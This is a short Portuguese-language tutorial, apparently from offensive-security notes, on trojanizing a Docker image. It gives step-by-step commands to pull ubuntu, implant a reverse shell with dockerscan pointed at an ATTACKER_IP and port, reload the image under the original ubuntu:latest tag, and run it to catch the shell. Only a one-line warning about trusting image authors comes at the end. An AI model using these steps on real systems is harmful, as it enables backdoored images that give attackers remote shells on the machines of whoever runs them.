🚪Backdooring docker container

Apresentação

Podemos criar uma nova imagem da imagem alvo para implementar uma backdoor, para quando ela for executada nós tenhamos a capacidade de pegar uma reverse shell

Backdoor

Para isso vamos utilizar a ferramenta dockerscan, para o nosso exemplo eu vou estar utilizando a imagem do ubuntu.

# Baixar a imagem do ubuntu
docker pull ubuntu:latest

# Vamos salvar a imagem do ubuntu
docker save ubuntu:latest -o ubuntu-original

# Agora com o source da imagem vamos colocar o backdoor
dockerscan image modify trojanize ubuntu-original -l <ATTACKER_IP> -p <ATTACKER_PORT> -o ubuntu-backdoor

# Após gerar a imagem com o backdoor, vamos instalá-la 
docker load -i ubuntu-backdoor.tar

# Agora só rodar e ver a reverse shell chegar
docker run -it ubuntu:latest /bin/bash

Ao parar de executar a imagem a conexão irá cair

Para manter a conexão ao executar a imagem será necessário a opção -i para pegar uma shell interativa, se rodar sem a opção ele simplesmente irá conectar e desconectar logo após

RevShell

Conclusão

Ao baixar imagens para rodar em seu computador, certifique-se que elas são de autores confiavéis. Olhe como proteger seu ambiente de imagens não confiáveis aqui